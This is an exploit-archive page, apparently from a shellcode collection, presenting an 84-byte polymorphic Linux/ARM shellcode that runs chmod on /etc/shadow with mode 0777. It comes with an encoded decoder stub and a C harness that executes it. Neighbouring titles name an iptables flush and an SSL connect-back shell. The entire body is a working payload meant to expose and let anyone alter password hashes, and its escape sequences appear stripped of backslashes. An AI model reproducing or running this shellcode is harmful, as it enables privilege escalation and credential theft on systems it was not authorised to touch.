[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
# Published : 2010-06-30
# Author :
# Previous Title : Linux/x86-64 - execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL
# Next Title : Linux/x86-32 - ConnectBack with SSL connection - 422 bytes
/*
| Title: Linux/ARM - polymorphic chmod("/etc/shadow", 0777) - 84 Bytes
| Type: Shellcode
| Author: Florian Gaultier <florian.gaultier@shell-storm.org>
| Platform: Linux ARM (ARM926EJ-S rev 5 (v51))
| [+] http://www.shell-storm.org
*/
#include <stdio.h>
char shellcode[] =
"x24x60x8fxe2" //add r6, pc, #36
"x16xffx2fxe1" //bx r6
"xdex40xa0xe3" //mov r4, #222
"x01x0cx54xe3" //cmp r4, #256
"x1exffx2fx81" //bxhi lr
"xdex40x44xe2" //sub r4, r4, #222
"x04x50xdexe7" //ldrb r5, [lr, r4]
"x02x50x85xe2" //add r5, r5, #2 (add 2 at every shellcode's byte)
"x04x50xcexe7" //strb r5, [lr, r4]
"xdfx40x84xe2" //add r4, r4, #223
"xf7xffxffxea" //b 8078
"xf5xffxffxeb" //bl 8074
//shellcode crypted
"xffx5ex8dxe0"
"x14xfdx2dxdf"
"x76x44"
"x0ax2e"
"xfdx1f"
"xfdx2f"
"x0dx25"
"xffxdd"
"xffx25"
"xffxdd"
"-cra-qf_bmu";
int main()
{
(*(void(*)()) shellcode)();
return 0;
}